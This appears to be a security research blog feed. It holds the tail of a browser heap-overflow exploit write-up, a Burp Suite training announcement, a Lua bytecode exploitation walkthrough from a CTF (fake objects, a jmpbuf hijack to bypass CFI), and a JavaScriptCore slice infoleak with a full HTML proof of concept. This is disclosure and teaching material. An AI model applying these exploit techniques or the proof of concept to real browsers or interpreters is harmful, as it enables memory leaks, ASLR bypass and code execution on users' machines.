  • multiple (around 6GB) buffers allocated by JavaScript to fill the holes created by realloc

  • around 256 MB of ArrayBuffers

However, since many of the buffers are never written to, they don’t necessarily consume any physical memory. Moreover, during the final realloc, only 4GB of the new buffer will be written to before the old buffer is freed, so really “only” 8 GB are required there.

That’s still a lot of memory though. However, there are some technologies that will help reduce that number if physical memory becomes low:

  • Memory compression (macOS): large memory regions can be compressed and swapped out. This is perfect for our use case since the 8GB buffer will be completely filled with zeroes. This effect can be observed in the Activity Monitor.app, which at some point shows more than 6 GB of memory as “compressed” during the exploit.

  • Page deduplication (Windows, Linux): pages containing the same content are mapped copy-on-write (COW) and point to the same physical page (essentially reducing memory usage to 4KB).

CPU usage will also be quite high during peak times (decompression). However, CPU pressure could be further reduced by sending the payload in smaller chunks with delays in between (which would obviously increase the time it takes for the exploit to work). This would also give the OS more time to compress and/or deduplicate the large memory buffers.

Further Possible Improvements

There are a few sources of unreliability in the current exploit, mostly dealing with timing:

  • During the sending of the payload data, if JavaScript runs the allocation before the browser has fully processed the next chunk, the allocations will “desynchronize”. This would likely lead to a failed exploit. Ideally, JavaScript would perform the allocation as soon as the next chunk has been received and processed, which may be possible to determine by observing CPU usage.

  • If a garbage collection cycle runs after we have corrupted the FreeSpan but before we have fixed it, we crash

  • If a compacting garbage collection cycle runs after we have freed some of the ArrayBuffers but before we have triggered the overflow, the exploit fails as the Arena will be filled up again.

  • If the fake free Cell happens to be placed inside the freed ArrayBuffer’s cell, then our exploit will fail and the browser will crash during the next garbage collection cycle. With 25 cells per arena this gives us a theoretical 1/25 chance to fail. However, in my experiments, the free cells were always located at the same offset (1216 bytes into the Arena), indicating that the state of the engine at the beginning of the exploit is fairly deterministic (at least regarding the state of the Arenas holding objects of size 160 bytes).

From my experience, the exploit runs pretty reliably (>95%) if the browser is not under heavy usage. The exploit still works if 10+ other tabs are open, but might fail if, for example, a large web application is currently loading.

Conclusion

While the bug isn’t ideal from an attacker’s perspective, it still can be exploited fairly reliably and without too much bandwidth usage. It is interesting to see how various technologies (compression, same page merging, …) can make a bug such as this one easier to exploit.

Thinking of ways to prevent exploitability of such a bug, a few things come to mind. One fairly generic mitigation is guard pages (a page leading to a segfault whenever accessed in some way). These would have to be allocated before or after every mmap-allocated region and would thus protect against exploitation of linear overflows such as this one. They would, however, not protect against non-linear overflows. Another possibility would be to introduce internal mmap randomization to scatter the allocated regions throughout the address space (likely only effective on 64-bit systems). This would best be performed by the kernel, but could also be done in userspace.

Developing Burp Suite Extensions training

1 March 2017 at 23:00
We couldn't be more excited to present our brand-new class on web security and security automation. This blog post provides a quick overview of the 8-hour workshop.

Title

Developing Burp Suite Extensions - From manual testing to security automation.

Overview

Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

Based on this premise, we have created a brand-new class taking advantage of Burp Suite - the de-facto standard for web application security. In just eight hours, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

After a quick intro to Burp and its extension APIs, we work on setting up an optimal development environment enabling fast coding and debugging. While we develop our code using Oracle’s Netbeans, we also provide templates for IntelliJ IDEA and Eclipse.

We will create many different types of plugins:

  • Extension #1: A custom logger to provide persistency and data export functionalities
  • Extension #2: A simple (and yet useful) replay tool
  • Extension #3: Active check for Burp’s scanning engine
  • Extension #4: Passive check for Burp’s scanning engine

Finally, we leverage our extensions to build a security automation toolchain integrated in a CI environment (Jenkins). This workshop is based on real-life use cases where the combination of custom checks and automation can help uncovering nasty security vulnerabilities.

All templates and code-complete Burp Suite extensions will be available for free on Doyensec’s Github. If you are curious, we’ve already uploaded the first three modules.

Audience

The training is suitable for both web application security specialists and developers. Attendees are expected to have a rudimentary understanding of Burp Suite as well as basic object-oriented programming experience (Burp extensions will be developed in Java).

Requirements

Attendees should bring their own laptop with the latest Java as well as their favourite IDE installed.

Upcoming dates

Location: Heidelberg (Germany)
Date: March 21, 2017
Notes: Delivered during the Troopers 2017 security conference. There are still seats available. Book it today and get Burp swag during the training!

Location: Warsaw (Poland)
Date: June 5, 2017
Notes: Come for the WarCon invite-only conference, stay for the training! For registration, please contact [email protected] with subject line "Burp Training Post-WarCon".

Private training

This training is delivered worldwide (English language) during both public and private events. Considering that the class is hands-on, we are able to accept up to 15 attendees. Video recording available on request.

Feel free to contact us at [email protected] for scheduling your class!

Pwning Lua through 'load'

1 January 2017 at 00:00

In this post we’ll take a look at how to exploit the load function in Lua.

The Lua interpreter provides an interesting function to Lua code: load. It makes it possible to load (and subsequently execute) precompiled Lua bytecode at runtime (which one can obtain either through luac or by using string.dump on a function). This is interesting since not only does it require a parser for a binary format, but it also allows execution of arbitrary bytecode. In fact, using afl to fuzz the bytecode loader will yield hundreds of crashes within a few minutes. Even the documentation explicitly warns about this function: “Lua does not check the consistency of binary chunks. Maliciously crafted binary chunks can crash the interpreter.”

Unsurprisingly, it turned out that malicious bytecode cannot just crash the interpreter, but also allows for native code execution within the interpreter process. This was the motivation for the “read-eval-pwn loop” CTF challenge of 33C3 CTF.

Let’s dig a bit deeper and find out what’s causing the interpreter to crash.

The Lua virtual machine is fairly simple, supporting only 47 different opcodes. It is a register-based machine, so many opcodes take register indices as operands. Other resources (e.g. constants) are also referenced by index. Take, for example, the implementation of the LOADK opcode, which loads a Lua value from a function’s constant table (to which the variable k points in the following code):

vmcase(OP_LOADK) {
    TValue *rb = k + GETARG_Bx(i);
    setobj2s(L, ra, rb);
    vmbreak;
}

We can see that there are no bounds checks of any kind. The same is true for other opcodes (and this also isn’t the only source of crashes). This is of course a known fact, but there also doesn’t seem to be a good solution for it, short of disabling load entirely. See also this email to the Lua mailing list that I wrote some time ago and the replies, in particular this one.

Anyway, this looks like an interesting “feature” to write an exploit for… ;)

Our plan will be to abuse the out-of-bounds indexing in the LOADK handler to inject custom objects into the virtual machine. The basic idea is to allocate lots of strings containing fake Lua values through the constant table of the serialized function, hoping that one of them ends up right behind the constants array during deserialization. Afterwards, we use the LOADK opcode with an out-of-bounds index to load a fake value from one of those strings.

Note that this approach has one drawback though: it relies on the heap layout since it indexes behind the heap chunk that holds the constants. This is a source of unreliability. It may be possible to avoid this by scanning (in the bytecode) for a particular value (e.g. a certain integer value) which marks the start of the fake values, but this is left as an exercise for the reader… ;)

At this point there is a very simple exploit in certain scenarios: assuming the Lua interpreter was modified such that e.g. os.execute was present in the binary but not available to Lua code (which happens if one just comments out this line in the source code), then we can simply create a fake function value that points to the native implementation and call it with whatever shell command we want to execute. If required, we can obtain the address of the interpreter code itself through tostring(load) (or any other native function for that matter):

> print(tostring(load))
"function: 0x41bcf0"

So what if we removed those functions entirely, and, to make it more interesting, also used clang’s control flow integrity on the binary so we couldn’t immediately gain RIP control through a fake function object? How can we exploit that?

Let’s start with an arbitrary read/write primitive:

  1. We’ll create a fake string object with its length field set to 0x7fffffffffffffff, allowing us to leak memory behind the string object itself (unfortunately, Lua treats the index into the string as an unsigned long, so reading before the string isn’t possible, but that also isn’t necessary)

  2. Since strings are immutable, we’ll also set up a fake table object (a combination of dict and list, if you’re familiar with Python), allowing us to write Lua values anywhere in memory by pointing the table’s array pointer at the desired address; the layouts both fake objects have to mimic are sketched below
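To get a feel for what the fake objects have to look like, here is a standalone sketch that approximates the relevant Lua 5.3 object layouts on x86-64 (field order follows lobject.h; the GC CommonHeader is expanded inline). The fields that matter are the long-string length for the read primitive and the array pointer plus array size for the write primitive:

/* fake_objects.c - sketch of the layouts the fake values mimic
   (assumption: vanilla Lua 5.3 on x86-64, field order as in lobject.h) */
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>

/* every collectable object starts with the expanded CommonHeader */
#define COMMON_HEADER void *next; uint8_t tt; uint8_t marked

typedef struct FakeTString {
    COMMON_HEADER;
    uint8_t extra;
    uint8_t shrlen;         /* length of short strings */
    unsigned int hash;
    size_t lnglen;          /* length of long strings: set to 0x7fffffffffffffff */
    /* in the real object, the string data follows this header */
} FakeTString;

typedef struct FakeTable {
    COMMON_HEADER;
    uint8_t flags;
    uint8_t lsizenode;
    unsigned int sizearray; /* size of the array part: make it huge */
    void *array;            /* array part: point this at the write target */
    void *node;
    void *lastfree;
    void *metatable;
    void *gclist;
} FakeTable;

int main(void) {
    /* the offsets are what the serialized fake bytes have to get right */
    printf("lnglen at %zu, sizearray at %zu, array at %zu\n",
           offsetof(FakeTString, lnglen),
           offsetof(FakeTable, sizearray),
           offsetof(FakeTable, array));
    return 0;
}

Besides these fields, the injected TValue itself carries a type tag that has to claim the right type (long string or table) for the interpreter to accept the fake value.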

Next, we notice that the interpreter makes use of the setjmp mechanism to implement exceptions and yielding inside coroutines. The setjmp API is an easy way to bypass CFI protection since longjmp loads various registers, including the instruction and stack pointers, directly from a memory buffer.
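This is the classic setjmp-based try/throw pattern (when built as plain C, Lua’s LUAI_TRY/LUAI_THROW macros in ldo.c expand to essentially this). A stripped-down sketch shows why control over the jmp_buf contents translates into control over the registers that longjmp restores:

/* setjmp_demo.c - stripped-down sketch of the try/throw pattern Lua builds
   on setjmp/longjmp; the jmp_buf stores the registers longjmp restores */
#include <setjmp.h>
#include <stdio.h>

static jmp_buf recover;      /* in Lua this lives in a struct lua_longjmp */

static void protected_work(int fail) {
    if (fail)
        longjmp(recover, 1); /* "throw": jump back to the setjmp site */
    puts("work completed");
}

int main(void) {
    if (setjmp(recover) == 0)    /* "try": returns 0 on the initial call */
        protected_work(1);
    else                         /* reached again via longjmp */
        puts("recovered from error");
    return 0;
}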

To finish our exploit we will thus allocate coroutines until one of them is placed after our fake string. We can then leak the address of its jmpbuf structure, modify it from inside the coroutine and call yield, causing the interpreter to jump to an arbitrary address with full control over rsp and a few other registers. A short ROP chain will do the rest.

The full exploit, together with all files necessary to reproduce the CTF challenge, is available on my GitHub.

JSC %TypedArray%.slice infoleak

19 September 2016 at 00:00

Just a very quick writeup of a bug I found in JavaScriptCore a few weeks ago. The code was at that time only shipping in the Safari Technology Preview and got fixed there with release 12.

The bug was located in TypedArrayView.prototype.slice when performing species construction. From JSGenericTypedArrayViewPrototypeFunctions.h:

template<typename ViewClass>
EncodedJSValue JSC_HOST_CALL genericTypedArrayViewProtoFuncSlice(ExecState* exec)
{

    // ...

    JSArrayBufferView* result = speciesConstruct(exec, thisObject, args, [&]() {
        Structure* structure = callee->globalObject()->typedArrayStructure(ViewClass::TypedArrayStorageType);
        return ViewClass::createUninitialized(exec, structure, length);
    });
    if (exec->hadException())
        return JSValue::encode(JSValue());

    // --1--

    // We return early here since we don't allocate a backing store if length is 0 and memmove does not like nullptrs
    if (!length)
        return JSValue::encode(result);

    // The species constructor may return an array with any arbitrary length.
    length = std::min(length, result->length());
    switch (result->classInfo()->typedArrayStorageType) {
    case TypeInt8:
        jsCast<JSInt8Array*>(result)->set(exec, 0, thisObject, begin, length, CopyType::LeftToRight);
        break;

    /* other cases */
    }

    return JSValue::encode(result);
}

At --1-- there is no check whether thisObject’s buffer has been transferred (detached/neutered) while executing a species constructor. Also note that the default constructor (the lambda expression) creates an uninitialized array. It is possible to detach the array buffer during speciesConstruct while still having the default constructor invoked, for example by setting up the target array as follows:

var a = new Uint8Array(N);
var c = new Function();
c.__defineGetter__(Symbol.species, function() { transferArrayBuffer(a.buffer); return undefined; });
a.constructor = c;

JSGenericTypedArrayView::set then does the following:

template<typename Adaptor>
bool JSGenericTypedArrayView<Adaptor>::set(
    ExecState* exec, unsigned offset, JSObject* object, unsigned objectOffset, unsigned length, CopyType type)
{
    const ClassInfo* ci = object->classInfo();
    if (ci->typedArrayStorageType == Adaptor::typeValue) {
        // The super fast case: we can just memcpy since we're the same type.
        JSGenericTypedArrayView* other = jsCast<JSGenericTypedArrayView*>(object);
        length = std::min(length, other->length());

        RELEASE_ASSERT(other->canAccessRangeQuickly(objectOffset, length));
        if (!validateRange(exec, offset, length))
            return false;

        memmove(typedVector() + offset, other->typedVector() + objectOffset, length * elementSize);
        return true;
    }

    // ...

Here, other will be the original array, which has been detached by now. Its length will be zero and the memmove becomes a no-op. This results in an uninitialized array being returned to the caller, potentially leaking addresses and thus allowing for an ASLR bypass.

Here is a complete single-page application ;) to trigger the bug and dump the leaked data:

<!DOCTYPE html>
<html>
<head>
    <style>
    body {
      font-family: monospace;
    }
    </style>

    <script>
    if (typeof window !== 'undefined') {
        print = function(msg) {
            document.body.innerText += msg + '\n';
        }
    }

    function hex(b) {
        return ('0' + b.toString(16)).substr(-2);
    }

    function hexdump(data) {
        if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
            data = Array.from(data);

        var lines = [];
        for (var i = 0; i < data.length; i += 16) {
            var chunk = data.slice(i, i+16);
            var parts = chunk.map(hex);
            if (parts.length > 8)
                parts.splice(8, 0, ' ');
            lines.push(parts.join(' '));
        }

        return lines.join('\n');
    }

    function trigger() {
        var worker = new Worker('worker.js');

        function transferArrayBuffer(ab) {
          worker.postMessage([ab], [ab]);
        }

        var a = null;

        var c = function(){};
        c.__defineGetter__(Symbol.species, function() { transferArrayBuffer(a.buffer); return undefined; });

        for (var i = 0; i < 1000; i++) {
            // Prepare array object
            a = new Uint8Array(new ArrayBuffer(1024));
            a.constructor = c;
            // Trigger the bug
            var b = a.slice(0, 1024);
            // Check if b now contains nonzero values
            if (b.filter((e) => e != 0).length > 0) {
                print('leaked data:');
                print(hexdump(b));
                break;
            }
        }
    }
    </script>
</head>
<body onload="trigger()">
    <p>please wait...</p><br />
</body>
</html>

The original report will eventually be available here.
